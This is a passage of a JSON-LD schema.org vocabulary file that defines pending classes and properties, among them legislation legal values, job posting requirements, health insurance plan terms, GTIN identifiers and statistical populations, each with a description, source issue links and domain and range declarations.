"http://schema.org/Drug" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": { "@id": "http://schema.org/HealthInsurancePlan" }, "rdfs:comment": "The insurance plans that cover this drug.", "rdfs:label": "includedInHealthInsurancePlan" }, { "@id": "http://schema.org/legislationLegalValue", "@type": "rdf:Property", "http://purl.org/dc/terms/source": [ { "@id": "http://publications.europa.eu/mdr/eli/index.html" }, { "@id": "https://github.com/schemaorg/schemaorg/issues/1156" } ], "http://schema.org/category": "issue-1156", "http://schema.org/domainIncludes": { "@id": "http://schema.org/LegislationObject" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": { "@id": "http://schema.org/LegalValueLevel" }, "http://www.w3.org/2002/07/owl#equivalentProperty": { "@id": "http://data.europa.eu/eli/ontology#legal_value" }, "http://www.w3.org/2004/02/skos/core#exactMatch": { "@id": "http://data.europa.eu/eli/ontology#legal_value" }, "rdfs:comment": "The legal value of this legislation file. The same legislation can be written in multiple files with different legal values. Typically a digitally signed PDF have a \"stronger\" legal value than the HTML file of the same act.", "rdfs:label": "legislationLegalValue" }, { "@id": "http://schema.org/accommodationFloorPlan", "@type": "rdf:Property", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/2373" }, "http://schema.org/category": "issue-2373", "http://schema.org/domainIncludes": [ { "@id": "http://schema.org/Accommodation" }, { "@id": "http://schema.org/Residence" } ], "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": { "@id": "http://schema.org/FloorPlan" }, "rdfs:comment": "A floorplan of some <a class=\"localLink\" href=\"http://schema.org/Accommodation\">Accommodation</a>.", "rdfs:label": "accommodationFloorPlan" }, { "@id": "http://schema.org/occupationalCategory", "@type": "rdf:Property", "http://purl.org/dc/terms/source": [ { "@id": "https://github.com/schemaorg/schemaorg/issues/2192" }, { "@id": "https://github.com/schemaorg/schemaorg/issues/1698" }, { "@id": "https://github.com/schemaorg/schemaorg/issues/2289" }, { "@id": "https://github.com/schemaorg/schemaorg/issues/2460" } ], "http://schema.org/category": [ "issue-2192", "issue-1698", "issue-2289", "issue-2460" ], "http://schema.org/domainIncludes": [ { "@id": "http://schema.org/WorkBasedProgram" }, { "@id": "http://schema.org/EducationalOccupationalProgram" }, { "@id": "http://schema.org/JobPosting" }, { "@id": "http://schema.org/Occupation" } ], "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": [ { "@id": "http://schema.org/Text" }, { "@id": "http://schema.org/CategoryCode" } ], "rdfs:comment": "A category describing the job, preferably using a term from a taxonomy such as <a href=\"http://www.onetcenter.org/taxonomy.html\">BLS O*NET-SOC</a>, <a href=\"https://www.ilo.org/public/english/bureau/stat/isco/isco08/\">ISCO-08</a> or similar, with the property repeated for each applicable value. Ideally the taxonomy should be identified, and both the textual label and formal code for the category should be provided.<br/><br/>\n\nNote: for historical reasons, any textual label and formal code provided as a literal may be assumed to be from O*NET-SOC.", "rdfs:label": "occupationalCategory" }, { "@id": "http://schema.org/publicTransportClosuresInfo", "@type": "rdf:Property", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/2490" }, "http://schema.org/category": "issue-2490", "http://schema.org/domainIncludes": { "@id": "http://schema.org/SpecialAnnouncement" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": [ { "@id": "http://schema.org/URL" }, { "@id": "http://schema.org/WebContent" } ], "rdfs:comment": "Information about public transport closures.", "rdfs:label": "publicTransportClosuresInfo" }, { "@id": "http://schema.org/programType", "@type": "rdf:Property", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/2460" }, "http://schema.org/category": "issue-2460", "http://schema.org/domainIncludes": { "@id": "http://schema.org/EducationalOccupationalProgram" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": [ { "@id": "http://schema.org/DefinedTerm" }, { "@id": "http://schema.org/Text" } ], "rdfs:comment": "The type of educational or occupational program. For example, classroom, internship, alternance, etc..", "rdfs:label": "programType" }, { "@id": "http://schema.org/MerchantReturnUnspecified", "@type": "http://schema.org/MerchantReturnEnumeration", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/2288" }, "http://schema.org/category": "issue-2288", "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "rdfs:comment": "MerchantReturnUnspecified: a product return policy is not specified here.", "rdfs:label": "MerchantReturnUnspecified" }, { "@id": "http://schema.org/renegotiableLoan", "@type": "rdf:Property", "http://purl.org/dc/terms/source": [ { "@id": "https://github.com/schemaorg/schemaorg/issues/1253" }, { "@id": "http://www.w3.org/wiki/WebSchemas/SchemaDotOrgSources#FIBO" } ], "http://schema.org/category": "issue-1253", "http://schema.org/domainIncludes": { "@id": "http://schema.org/LoanOrCredit" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": { "@id": "http://schema.org/Boolean" }, "rdfs:comment": "Whether the terms for payment of interest can be renegotiated during the life of the loan.", "rdfs:label": "renegotiableLoan" }, { "@id": "http://schema.org/ethicsPolicy", "@type": "rdf:Property", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/1525" }, "http://schema.org/category": "issue-1525", "http://schema.org/domainIncludes": [ { "@id": "http://schema.org/NewsMediaOrganization" }, { "@id": "http://schema.org/Organization" } ], "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": [ { "@id": "http://schema.org/URL" }, { "@id": "http://schema.org/CreativeWork" } ], "rdfs:comment": "Statement about ethics policy, e.g. of a <a class=\"localLink\" href=\"http://schema.org/NewsMediaOrganization\">NewsMediaOrganization</a> regarding journalistic and publishing practices, or of a <a class=\"localLink\" href=\"http://schema.org/Restaurant\">Restaurant</a>, a page describing food source policies. In the case of a <a class=\"localLink\" href=\"http://schema.org/NewsMediaOrganization\">NewsMediaOrganization</a>, an ethicsPolicy is typically a statement describing the personal, organizational, and corporate standards of behavior expected by the organization.", "rdfs:label": "ethicsPolicy" }, { "@id": "http://schema.org/LegislationObject", "@type": "rdfs:Class", "http://purl.org/dc/terms/source": [ { "@id": "https://github.com/schemaorg/schemaorg/issues/1156" }, { "@id": "http://publications.europa.eu/mdr/eli/index.html" } ], "http://schema.org/category": "issue-1156", "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://www.w3.org/2004/02/skos/core#closeMatch": { "@id": "http://data.europa.eu/eli/ontology#Format" }, "rdfs:comment": "A specific object or file containing a Legislation. Note that the same Legislation can be published in multiple files. For example, a digitally signed PDF, a plain PDF and an HTML version.", "rdfs:label": "LegislationObject", "rdfs:subClassOf": [ { "@id": "http://schema.org/MediaObject" }, { "@id": "http://schema.org/Legislation" } ] }, { "@id": "http://schema.org/ShortStory", "@type": "rdfs:Class", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/1976" }, "http://schema.org/category": "issue-1976", "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "rdfs:comment": "Short story or tale. A brief work of literature, usually written in narrative prose.", "rdfs:label": "ShortStory", "rdfs:subClassOf": { "@id": "http://schema.org/CreativeWork" } }, { "@id": "http://schema.org/TouristDestination", "@type": "rdfs:Class", "http://purl.org/dc/terms/source": [ { "@id": "http://www.w3.org/wiki/WebSchemas/SchemaDotOrgSources#IIT-CNR.it" }, { "@id": "http://www.w3.org/wiki/WebSchemas/SchemaDotOrgSources#Tourism" } ], "http://schema.org/category": "issue-1810", "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "rdfs:comment": "A tourist destination. In principle any <a class=\"localLink\" href=\"http://schema.org/Place\">Place</a> can be a <a class=\"localLink\" href=\"http://schema.org/TouristDestination\">TouristDestination</a> from a <a class=\"localLink\" href=\"http://schema.org/City\">City</a>, <a class=\"localLink\" href=\"http://schema.org/Region\">Region</a> or <a class=\"localLink\" href=\"http://schema.org/Country\">Country</a> to an <a class=\"localLink\" href=\"http://schema.org/AmusementPark\">AmusementPark</a> or <a class=\"localLink\" href=\"http://schema.org/Hotel\">Hotel</a>. This Type can be used on its own to describe a general <a class=\"localLink\" href=\"http://schema.org/TouristDestination\">TouristDestination</a>, or be used as an <a class=\"localLink\" href=\"http://schema.org/additionalType\">additionalType</a> to add tourist relevant properties to any other <a class=\"localLink\" href=\"http://schema.org/Place\">Place</a>. A <a class=\"localLink\" href=\"http://schema.org/TouristDestination\">TouristDestination</a> is defined as a <a class=\"localLink\" href=\"http://schema.org/Place\">Place</a> that contains, or is colocated with, one or more <a class=\"localLink\" href=\"http://schema.org/TouristAttraction\">TouristAttraction</a>s, often linked by a similar theme or interest to a particular <a class=\"localLink\" href=\"http://schema.org/touristType\">touristType</a>. The <a href=\"http://www2.unwto.org/\">UNWTO</a> defines Destination (main destination of a tourism trip) as the place visited that is central to the decision to take the trip.\n (See examples below).", "rdfs:label": "TouristDestination", "rdfs:subClassOf": { "@id": "http://schema.org/Place" } }, { "@id": "http://schema.org/ResearchProject", "@type": "rdfs:Class", "http://purl.org/dc/terms/source": { "@id": "https://www.w3.org/wiki/WebSchemas/SchemaDotOrgSources#FundInfoCollab" }, "http://schema.org/category": "issue-383", "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "rdfs:comment": "A Research project.", "rdfs:label": "ResearchProject", "rdfs:subClassOf": { "@id": "http://schema.org/Project" } }, { "@id": "http://schema.org/MonetaryGrant", "@type": "rdfs:Class", "http://purl.org/dc/terms/source": { "@id": "https://www.w3.org/wiki/WebSchemas/SchemaDotOrgSources#FundInfoCollab" }, "http://schema.org/category": "issue-383", "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "rdfs:comment": "A monetary grant.", "rdfs:label": "MonetaryGrant", "rdfs:subClassOf": { "@id": "http://schema.org/Grant" } }, { "@id": "http://schema.org/legislationLegalForce", "@type": "rdf:Property", "http://purl.org/dc/terms/source": [ { "@id": "https://github.com/schemaorg/schemaorg/issues/1156" }, { "@id": "http://publications.europa.eu/mdr/eli/index.html" } ], "http://schema.org/category": "issue-1156", "http://schema.org/domainIncludes": { "@id": "http://schema.org/Legislation" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": { "@id": "http://schema.org/LegalForceStatus" }, "http://www.w3.org/2002/07/owl#equivalentProperty": { "@id": "http://data.europa.eu/eli/ontology#in_force" }, "http://www.w3.org/2004/02/skos/core#exactMatch": { "@id": "http://data.europa.eu/eli/ontology#in_force" }, "rdfs:comment": "Whether the legislation is currently in force, not in force, or partially in force.", "rdfs:label": "legislationLegalForce" }, { "@id": "http://schema.org/itinerary", "@type": "rdf:Property", "http://purl.org/dc/terms/source": { "@id": "http://www.w3.org/wiki/WebSchemas/SchemaDotOrgSources#Tourism" }, "http://schema.org/category": "issue-1810", "http://schema.org/domainIncludes": { "@id": "http://schema.org/Trip" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": [ { "@id": "http://schema.org/ItemList" }, { "@id": "http://schema.org/Place" } ], "rdfs:comment": "Destination(s) ( <a class=\"localLink\" href=\"http://schema.org/Place\">Place</a> ) that make up a trip. For a trip where destination order is important use <a class=\"localLink\" href=\"http://schema.org/ItemList\">ItemList</a> to specify that order (see examples).", "rdfs:label": "itinerary" }, { "@id": "http://schema.org/3DModel", "@type": "rdfs:Class", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/2140" }, "http://schema.org/category": "issue-2140", "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "rdfs:comment": "A 3D model represents some kind of 3D content, which may have <a class=\"localLink\" href=\"http://schema.org/encoding\">encoding</a>s in one or more <a class=\"localLink\" href=\"http://schema.org/MediaObject\">MediaObject</a>s. Many 3D formats are available (e.g. see <a href=\"https://en.wikipedia.org/wiki/Category:3D_graphics_file_formats\">Wikipedia</a>); specific encoding formats can be represented using the <a class=\"localLink\" href=\"http://schema.org/encodingFormat\">encodingFormat</a> property applied to the relevant <a class=\"localLink\" href=\"http://schema.org/MediaObject\">MediaObject</a>. For the\ncase of a single file published after Zip compression, the convention of appending '+zip' to the <a class=\"localLink\" href=\"http://schema.org/encodingFormat\">encodingFormat</a> can be used. Geospatial, AR/VR, artistic/animation, gaming, engineering and scientific content can all be represented using <a class=\"localLink\" href=\"http://schema.org/3DModel\">3DModel</a>.", "rdfs:label": "3DModel", "rdfs:subClassOf": { "@id": "http://schema.org/CreativeWork" } }, { "@id": "http://schema.org/observationDate", "@type": "rdf:Property", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/2291" }, "http://schema.org/category": "issue-2291", "http://schema.org/domainIncludes": { "@id": "http://schema.org/Observation" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": { "@id": "http://schema.org/DateTime" }, "rdfs:comment": "The observationDate of an <a class=\"localLink\" href=\"http://schema.org/Observation\">Observation</a>.", "rdfs:label": "observationDate" }, { "@id": "http://schema.org/healthPlanCoinsuranceOption", "@type": "rdf:Property", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/1062" }, "http://schema.org/category": "issue-1062", "http://schema.org/domainIncludes": { "@id": "http://schema.org/HealthPlanCostSharingSpecification" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": { "@id": "http://schema.org/Text" }, "rdfs:comment": "Whether the coinsurance applies before or after deductible, etc. TODO: Is this a closed set?", "rdfs:label": "healthPlanCoinsuranceOption" }, { "@id": "http://schema.org/itemLocation", "@type": "rdf:Property", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/1758" }, "http://schema.org/category": { "@language": "en", "@value": "issue-1758" }, "http://schema.org/domainIncludes": { "@id": "http://schema.org/ArchiveComponent" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": [ { "@id": "http://schema.org/Text" }, { "@id": "http://schema.org/Place" }, { "@id": "http://schema.org/PostalAddress" } ], "rdfs:comment": "Current location of the item.", "rdfs:label": { "@language": "en", "@value": "itemLocation" }, "rdfs:subPropertyOf": { "@id": "http://schema.org/location" } }, { "@id": "http://schema.org/bankAccountType", "@type": "rdf:Property", "http://purl.org/dc/terms/source": [ { "@id": "http://www.w3.org/wiki/WebSchemas/SchemaDotOrgSources#FIBO" }, { "@id": "https://github.com/schemaorg/schemaorg/issues/1253" } ], "http://schema.org/category": "issue-1253", "http://schema.org/domainIncludes": { "@id": "http://schema.org/BankAccount" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": [ { "@id": "http://schema.org/URL" }, { "@id": "http://schema.org/Text" } ], "rdfs:comment": "The type of a bank account.", "rdfs:label": "bankAccountType" }, { "@id": "http://schema.org/sensoryRequirement", "@type": "rdf:Property", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/2384" }, "http://schema.org/category": "issue-2384", "http://schema.org/domainIncludes": { "@id": "http://schema.org/JobPosting" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": [ { "@id": "http://schema.org/DefinedTerm" }, { "@id": "http://schema.org/URL" }, { "@id": "http://schema.org/Text" } ], "rdfs:comment": "A description of any sensory requirements and levels necessary to function on the job, including hearing and vision. Defined terms such as those in O*net may be used, but note that there is no way to specify the level of ability as well as its nature when using a defined term.", "rdfs:label": "sensoryRequirement" }, { "@id": "http://schema.org/FundingAgency", "@type": "rdfs:Class", "http://purl.org/dc/terms/source": { "@id": "https://www.w3.org/wiki/WebSchemas/SchemaDotOrgSources#FundInfoCollab" }, "http://schema.org/category": "issue-383", "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "rdfs:comment": "A FundingAgency is an organization that implements one or more <a class=\"localLink\" href=\"http://schema.org/FundingScheme\">FundingScheme</a>s and manages\n the granting process (via <a class=\"localLink\" href=\"http://schema.org/Grant\">Grant</a>s, typically <a class=\"localLink\" href=\"http://schema.org/MonetaryGrant\">MonetaryGrant</a>s).\n A funding agency is not always required for grant funding, e.g. philanthropic giving, corporate sponsorship etc.<br/><br/>\n\n<pre><code>Examples of funding agencies include ERC, REA, NIH, Bill and Melinda Gates Foundation...\n</code></pre>\n", "rdfs:label": "FundingAgency", "rdfs:subClassOf": { "@id": "http://schema.org/Project" } }, { "@id": "http://schema.org/healthPlanCoinsuranceRate", "@type": "rdf:Property", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/1062" }, "http://schema.org/category": "issue-1062", "http://schema.org/domainIncludes": { "@id": "http://schema.org/HealthPlanCostSharingSpecification" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": { "@id": "http://schema.org/Number" }, "rdfs:comment": "Whether The rate of coinsurance expressed as a number between 0.0 and 1.0.", "rdfs:label": "healthPlanCoinsuranceRate" }, { "@id": "http://schema.org/knowsLanguage", "@type": "rdf:Property", "http://purl.org/dc/terms/source": [ { "@id": "https://github.com/schemaorg/schemaorg/issues/1688" }, { "@id": "https://www.w3.org/wiki/WebSchemas/SchemaDotOrgSources#TP" } ], "http://schema.org/category": "issue-1688", "http://schema.org/domainIncludes": [ { "@id": "http://schema.org/Organization" }, { "@id": "http://schema.org/Person" } ], "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": [ { "@id": "http://schema.org/Language" }, { "@id": "http://schema.org/Text" } ], "rdfs:comment": "Of a <a class=\"localLink\" href=\"http://schema.org/Person\">Person</a>, and less typically of an <a class=\"localLink\" href=\"http://schema.org/Organization\">Organization</a>, to indicate a known language. We do not distinguish skill levels or reading/writing/speaking/signing here. Use language codes from the <a href=\"http://tools.ietf.org/html/bcp47\">IETF BCP 47 standard</a>.", "rdfs:label": "knowsLanguage" }, { "@id": "http://schema.org/OfficialLegalValue", "@type": "http://schema.org/LegalValueLevel", "http://purl.org/dc/terms/source": [ { "@id": "http://publications.europa.eu/mdr/eli/index.html" }, { "@id": "https://github.com/schemaorg/schemaorg/issues/1156" } ], "http://schema.org/category": "issue-1156", "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://www.w3.org/2004/02/skos/core#exactMatch": { "@id": "http://data.europa.eu/eli/ontology#LegalValue-official" }, "rdfs:comment": "All the documents published by an official publisher should have at least the legal value level \"OfficialLegalValue\". This indicates that the document was published by an organisation with the public task of making it available (e.g. a consolidated version of a EU directive published by the EU Office of Publications).", "rdfs:label": "OfficialLegalValue" }, { "@id": "http://schema.org/collectionSize", "@type": "rdf:Property", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/1759" }, "http://schema.org/category": { "@language": "en", "@value": "issue-1759" }, "http://schema.org/domainIncludes": { "@id": "http://schema.org/Collection" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": { "@id": "http://schema.org/Integer" }, "rdfs:comment": "The number of items in the <a class=\"localLink\" href=\"http://schema.org/Collection\">Collection</a>.", "rdfs:label": { "@language": "en", "@value": "collectionSize" } }, { "@id": "http://schema.org/UnofficialLegalValue", "@type": "http://schema.org/LegalValueLevel", "http://purl.org/dc/terms/source": [ { "@id": "http://publications.europa.eu/mdr/eli/index.html" }, { "@id": "https://github.com/schemaorg/schemaorg/issues/1156" } ], "http://schema.org/category": "issue-1156", "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://www.w3.org/2004/02/skos/core#exactMatch": { "@id": "http://data.europa.eu/eli/ontology#LegalValue-unofficial" }, "rdfs:comment": "Indicates that a document has no particular or special standing (e.g. a republication of a law by a private publisher).", "rdfs:label": "UnofficialLegalValue" }, { "@id": "http://schema.org/usageInfo", "@type": "rdf:Property", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/2454" }, "http://schema.org/category": "issue-2454", "http://schema.org/domainIncludes": { "@id": "http://schema.org/CreativeWork" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": [ { "@id": "http://schema.org/CreativeWork" }, { "@id": "http://schema.org/URL" } ], "rdfs:comment": "The schema.org <a class=\"localLink\" href=\"http://schema.org/usageInfo\">usageInfo</a> property indicates further information about a <a class=\"localLink\" href=\"http://schema.org/CreativeWork\">CreativeWork</a>. This property is applicable both to works that are freely available and to those that require payment or other transactions. It can reference additional information e.g. community expectations on preferred linking and citation conventions, as well as purchasing details. For something that can be commercially licensed, usageInfo can provide detailed, resource-specific information about licensing options.<br/><br/>\n\nThis property can be used alongside the license property which indicates license(s) applicable to some piece of content. The usageInfo property can provide information about other licensing options, e.g. acquiring commercial usage rights for an image that is also available under non-commercial creative commons licenses.", "rdfs:label": "usageInfo" }, { "@id": "http://schema.org/gtin", "@type": "rdf:Property", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/2288" }, "http://schema.org/category": "issue-1244", "http://schema.org/domainIncludes": [ { "@id": "http://schema.org/Demand" }, { "@id": "http://schema.org/Product" }, { "@id": "http://schema.org/Offer" } ], "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": { "@id": "http://schema.org/Text" }, "rdfs:comment": "A Global Trade Item Number (<a href=\"https://www.gs1.org/standards/id-keys/gtin\">GTIN</a>). GTINs identify trade items, including products and services, using numeric identification codes. The <a class=\"localLink\" href=\"http://schema.org/gtin\">gtin</a> property generalizes the earlier <a class=\"localLink\" href=\"http://schema.org/gtin8\">gtin8</a>, <a class=\"localLink\" href=\"http://schema.org/gtin12\">gtin12</a>, <a class=\"localLink\" href=\"http://schema.org/gtin13\">gtin13</a>, and <a class=\"localLink\" href=\"http://schema.org/gtin14\">gtin14</a> properties. The GS1 <a href=\"https://www.gs1.org/standards/Digital-Link/\">digital link specifications</a> express GTINs as URLs. A correct <a class=\"localLink\" href=\"http://schema.org/gtin\">gtin</a> value should be a valid GTIN, which means that it should be an all-numeric string of either 8, 12, 13 or 14 digits, or a \"GS1 Digital Link\" URL based on such a string. The numeric component should also have a <a href=\"https://www.gs1.org/services/check-digit-calculator\">valid GS1 check digit</a> and meet the other rules for valid GTINs. See also <a href=\"http://www.gs1.org/barcodes/technical/idkeys/gtin\">GS1's GTIN Summary</a> and <a href=\"https://en.wikipedia.org/wiki/Global_Trade_Item_Number\">Wikipedia</a> for more details. Left-padding of the gtin values is not required or encouraged.", "rdfs:label": "gtin", "rdfs:subPropertyOf": { "@id": "http://schema.org/identifier" } }, { "@id": "http://schema.org/healthPlanCopayOption", "@type": "rdf:Property", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/1062" }, "http://schema.org/category": "issue-1062", "http://schema.org/domainIncludes": { "@id": "http://schema.org/HealthPlanCostSharingSpecification" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": { "@id": "http://schema.org/Text" }, "rdfs:comment": "Whether the copay is before or after deductible, etc. TODO: Is this a closed set?", "rdfs:label": "healthPlanCopayOption" }, { "@id": "http://schema.org/physicalRequirement", "@type": "rdf:Property", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/2384" }, "http://schema.org/category": "issue-2384", "http://schema.org/domainIncludes": { "@id": "http://schema.org/JobPosting" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": [ { "@id": "http://schema.org/URL" }, { "@id": "http://schema.org/Text" }, { "@id": "http://schema.org/DefinedTerm" } ], "rdfs:comment": "A description of the types of physical activity associated with the job. Defined terms such as those in O*net may be used, but note that there is no way to specify the level of ability as well as its nature when using a defined term.", "rdfs:label": "physicalRequirement" }, { "@id": "http://schema.org/returnPolicyCategory", "@type": "rdf:Property", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/2288" }, "http://schema.org/category": "issue-2288", "http://schema.org/domainIncludes": { "@id": "http://schema.org/MerchantReturnPolicy" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": { "@id": "http://schema.org/MerchantReturnEnumeration" }, "rdfs:comment": "A returnPolicyCategory expresses at most one of several enumerated kinds of return.", "rdfs:label": "returnPolicyCategory" }, { "@id": "http://schema.org/WebContent", "@type": "rdfs:Class", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/2358" }, "http://schema.org/category": "issue-2358", "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "rdfs:comment": "WebContent is a type representing all <a class=\"localLink\" href=\"http://schema.org/WebPage\">WebPage</a>, <a class=\"localLink\" href=\"http://schema.org/WebSite\">WebSite</a> and <a class=\"localLink\" href=\"http://schema.org/WebPageElement\">WebPageElement</a> content. It is sometimes the case that detailed distinctions between Web pages, sites and their parts is not always important or obvious. The <a class=\"localLink\" href=\"http://schema.org/WebContent\">WebContent</a> type makes it easier to describe Web-addressable content without requiring such distinctions to always be stated. (The intent is that the existing types <a class=\"localLink\" href=\"http://schema.org/WebPage\">WebPage</a>, <a class=\"localLink\" href=\"http://schema.org/WebSite\">WebSite</a> and <a class=\"localLink\" href=\"http://schema.org/WebPageElement\">WebPageElement</a> will eventually be declared as subtypes of <a class=\"localLink\" href=\"http://schema.org/WebContent\">WebContent</a>.)", "rdfs:label": "WebContent", "rdfs:subClassOf": { "@id": "http://schema.org/CreativeWork" } }, { "@id": "http://schema.org/repeatFrequency", "@type": "rdf:Property", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/1457" }, "http://schema.org/category": "issue-1457", "http://schema.org/domainIncludes": { "@id": "http://schema.org/Schedule" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": [ { "@id": "http://schema.org/Text" }, { "@id": "http://schema.org/Duration" } ], "rdfs:comment": "Defines the frequency at which <a class=\"localLink\" href=\"http://schema.org/Events\">Events</a> will occur according to a schedule <a class=\"localLink\" href=\"http://schema.org/Schedule\">Schedule</a>. The intervals between\n events should be defined as a <a class=\"localLink\" href=\"http://schema.org/Duration\">Duration</a> of time.", "rdfs:label": "repeatFrequency", "rdfs:subPropertyOf": { "@id": "http://schema.org/frequency" } }, { "@id": "http://schema.org/StatisticalPopulation", "@type": "rdfs:Class", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/2291" }, "http://schema.org/category": "issue-2291", "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "rdfs:comment": "A StatisticalPopulation is a set of instances of a certain given type that satisfy some set of constraints. The property <a class=\"localLink\" href=\"http://schema.org/populationType\">populationType</a> is used to specify the type. Any property that can be used on instances of that type can appear on the statistical population. For example, a <a class=\"localLink\" href=\"http://schema.org/StatisticalPopulation\">StatisticalPopulation</a> representing all <a class=\"localLink\" href=\"http://schema.org/Person\">Person</a>s with a <a class=\"localLink\" href=\"http://schema.org/homeLocation\">homeLocation</a> of East Podunk California, would be described by applying the appropriate <a class=\"localLink\" href=\"http://schema.org/homeLocation\">homeLocation</a> and <a class=\"localLink\" href=\"http://schema.org/populationType\">populationType</a> properties to a <a class=\"localLink\" href=\"http://schema.org/StatisticalPopulation\">StatisticalPopulation</a> item that stands for that set of people.\nThe properties <a class=\"localLink\" href=\"http://schema.org/numConstraints\">numConstraints</a> and <a class=\"localLink\" href=\"http://schema.org/constrainingProperties\">constrainingProperties</a> are used to specify which of the populations properties are used to specify the population. Note that the sense of \"population\" used here is the general sense of a statistical\npopulation, and does not imply that the population consists of people. For example, a <a class=\"localLink\" href=\"http://schema.org/populationType\">populationType</a> of <a class=\"localLink\" href=\"http://schema.org/Event\">Event</a> or <a class=\"localLink\" href=\"http://schema.org/NewsArticle\">NewsArticle</a> could be used. See also <a class=\"localLink\" href=\"http://schema.org/Observation\">Observation</a>, and the <a href=\"/docs/data-and-datasets.html\">data and datasets</a> overview for more details.", "rdfs:label": "StatisticalPopulation", "rdfs:subClassOf": { "@id": "http://schema.org/Intangible" } }, { "@id": "http://schema.org/legislationDateVersion", "@type": "rdf:Property", "http://purl.org/dc/terms/source": [ { "@id": "http://publications.europa.eu/mdr/eli/index.html" }, { "@id": "https://github.com/schemaorg/schemaorg/issues/1156" } ], "http://schema.org/category": "issue-1156", "http://schema.org/domainIncludes": { "@id": "http://schema.org/Legislation" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": { "@id": "http://schema.org/Date" }, "http://www.w3.org/2002/07/owl#equivalentProperty": { "@id": "http://data.europa.eu/eli/ontology#version_date" }, "http://www.w3.org/2004/02/skos/core#exactMatch": { "@id": "http://data.europa.eu/eli/ontology#version_date" }, "rdfs:comment": "The point-in-time at which the provided description of the legislation is valid (e.g. : when looking at the law on the 2016-04-07 (= dateVersion), I get the consolidation of 2015-04-12 of the \"National Insurance Contributions Act 2015\")", "rdfs:label": "legislationDateVersion" }, { "@id": "http://schema.org/HealthInsurancePlan", "@type": "rdfs:Class", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/1062" }, "http://schema.org/category": "issue-1062", "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "rdfs:comment": "A US-style health insurance plan, including PPOs, EPOs, and HMOs.", "rdfs:label": "HealthInsurancePlan", "rdfs:subClassOf": { "@id": 